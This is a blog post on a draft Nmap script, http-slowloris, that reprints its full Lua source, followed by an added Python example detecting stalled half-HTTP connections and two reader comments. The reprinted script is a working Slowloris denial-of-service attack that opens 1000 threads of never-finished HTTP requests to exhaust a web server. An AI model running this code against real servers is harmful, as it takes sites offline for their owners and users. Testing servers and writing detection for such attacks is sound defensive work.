Nmap: Script detects servers vulnerable to DoS attacks with Slowloris

Development of scripts for Nmap is moving at full speed. Responding to requests on the NSE Wiki, developer Ange Gutek has released a draft of a script that detects whether a server is vulnerable to DoS attacks using Slowloris.

According to Gutek, at this point the script carries out the attack without knowing whether it succeeded, produces no output, and will run forever. Monitoring is done through debug mode (-d).


nmap --script http-slowloris --script-args [ARGUMENTS] [TARGET]


http-slowloris.threads – Maximum number of concurrent connections; if the target is Windows, this value is limited to 130.

http-slowloris.timeout – Time to wait before sending new HTTP header data. Default 100 seconds.

Gutek is calling for contributors to help improve the script.


description = [[
Tests a webserver against the Slowloris DoS attack, as it was described at Defcon 17 by RSnake

This script opens and maintains numerous 'half-http' connections until the webserver runs out of resources,
leading to a denial of service.
When the DoS condition is met the script then stops the attack and returns the payload data as they could be useful to tweak further filtering rules:
- Time taken until DoS
- Number of threads used
- Number of queries sent (or: amount of data sent, in bytes)

 o Add a stopping mechanism
   + reserve a thread to monitor the webserver from time to time. If not responding, then stop.
 o Analyze the threads: if the number of effective connections is lower than required by the script, maybe notify of a potential filtering rule ahead.
 o Add user-supplied arguments:
   + threads, the max number of concurrent connections on the target: on Windows it seems to be limited to 130
   + timeout, time to wait before sending new http header data in order to maintain the connection. Defaults to 100 seconds, but could be measured as does
]]

-- @usage
-- nmap --script http-slowloris --script-args http-slowloris.threads=500 http-slowloris.timeout=200

-- @args http-slowloris.threads The max number of concurrent connections on the target: on Windows it seems to be limited to 130.
-- @args http-slowloris.timeout Time to wait before sending new http header data in order to maintain the connection. Defaults to 100 seconds.

-- @output
-- 80/tcp open http syn-ack
-- | http-slowloris: Target was DoSed:
-- | the attack took

author = "Ange Gutek"

license = "Same as Nmap--See"
categories = {"dos", "intrusive"}

require "shortport"
require "stdnse"

portrule = shortport.http

action = function(host, port)

  local output, i
  local threads = {}
  nmap.registry.slowloris = {}

  -- Threaded function ------------------------------------------------------
  local doHalfhttp = function(host, port)
    local get_uri = math.random(100000, 900000) -- we will query a random page
    -- create socket
    local slowloris = nmap.new_socket()
    local catch = function()
      slowloris:close() -- release the socket if a try() call fails
    end
    local try = nmap.new_try(catch)
    try(slowloris:connect(host.ip, port))

    -- Build a half-http header. Maybe the user-agent string should outline Nmap instead ?
    local half_http = "GET /"..get_uri.." HTTP/1.1\r\n"
    half_http = half_http.."Host: ".."\r\n"
    half_http = half_http.."User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
    half_http = half_http.."Content-Length: 42\r\n"

    local count = nmap.registry.slowloris['threads'] -- retrieve the number of already effective connection

    count = count + 1
    stdnse.print_debug(1, "%s: USING %d THREADS)...", SCRIPT_NAME, nmap.registry.slowloris['threads'])

    local queries = 2
    while true do
      -- this is where we set the time to wait before maintaining the connection by sending a new line to the http header
      -- this value would be more efficient if it was just below the target timeout
      try(slowloris:send("X-a: b\r\n"))
      queries = queries + 1
      queries = queries * nmap.registry.slowloris['threads']
      stdnse.print_debug(1, "%s: SENT %d QUERIES SO FAR (using %d threads)...", SCRIPT_NAME, queries, nmap.registry.slowloris['threads'])
    end
  end

  -- --------------------------------------------------------------------------

  -- Main
  for i=1,1000 do -- Number of threads to launch
    local co = stdnse.new_thread(doHalfhttp, host, port)
    threads[co] = true
  end
  return output
end
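
The script's description says its results "could be useful to tweak further filtering rules". The following is an added example, not part of Gutek's script or of the original post, showing what such a rule can key on from the server side: requests whose header block is never terminated by a blank line, held open by repeated padding headers such as `X-a: b`. The `Conn` record, the 30-second and 3-connection thresholds, and the sample connections are assumptions constructed for illustration.

```python
from collections import Counter
from dataclasses import dataclass

HEADER_END = b"\r\n\r\n"  # blank line that terminates an HTTP request header

@dataclass
class Conn:
    src: str         # client address
    age: float       # seconds since the connection was accepted
    received: bytes  # every byte the client has sent so far

def is_half_http(conn, max_header_age=30.0):
    """True if the header is still unterminated after max_header_age seconds."""
    return HEADER_END not in conn.received and conn.age > max_header_age

def repeated_header(conn):
    """Highest repeat count of any single header name (padding lines)."""
    lines = conn.received.split(b"\r\n")[1:]  # skip the request line
    names = Counter(ln.split(b":", 1)[0].strip().lower() for ln in lines if b":" in ln)
    return max(names.values(), default=0)

def slow_header_sources(conns, max_header_age=30.0, min_conns=3):
    """Map each source holding >= min_conns unterminated requests to
    (connection count, worst header repeat count)."""
    stalled = [c for c in conns if is_half_http(c, max_header_age)]
    per_src = Counter(c.src for c in stalled)
    return {
        src: (n, max(repeated_header(c) for c in stalled if c.src == src))
        for src, n in per_src.items() if n >= min_conns
    }

# Constructed sample data (documentation addresses, not real traffic).
HALF = (b"GET /123456 HTTP/1.1\r\nHost: www.example.test\r\n"
        b"User-Agent: Mozilla/4.0\r\nContent-Length: 42\r\n")
SAMPLE = [
    Conn("192.0.2.10", 120, HALF + b"X-a: b\r\n" * 1),
    Conn("192.0.2.10", 240, HALF + b"X-a: b\r\n" * 2),
    Conn("192.0.2.10", 310, HALF + b"X-a: b\r\n" * 3),
    Conn("192.0.2.10", 95, HALF),
    Conn("198.51.100.7", 2, b"GET / HTTP/1.1\r\nHost: www.exa"),  # young, still sending
    Conn("198.51.100.7", 45, b"GET / HTTP/1.1\r\n"),               # a single stalled connection
    Conn("203.0.113.5", 400, b"GET / HTTP/1.1\r\nHost: a.test\r\n\r\n"),  # complete, idle
]

if __name__ == "__main__":
    for src, (n, rep) in slow_header_sources(SAMPLE).items():
        print(f"{src}: {n} unterminated requests, a header repeated up to {rep}x")
```

Counting per source matters because a single slow client on a poor link looks the same as one connection of this kind; the signal is many unterminated requests from one address at the same time.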



  1. Gutek May 8, 2011

    Thank you for reporting my work.
    This script development has made its way through several issues and I’m happy to say that I should be able to release a better version soon.
    The script will have a target monitoring engine and will stop the attack when the denial-of-service conditions are met, providing a report stating which conditions made the attack successful.


  2. Alexos May 9, 2011

    Hi Gutek,

    You’re welcome.



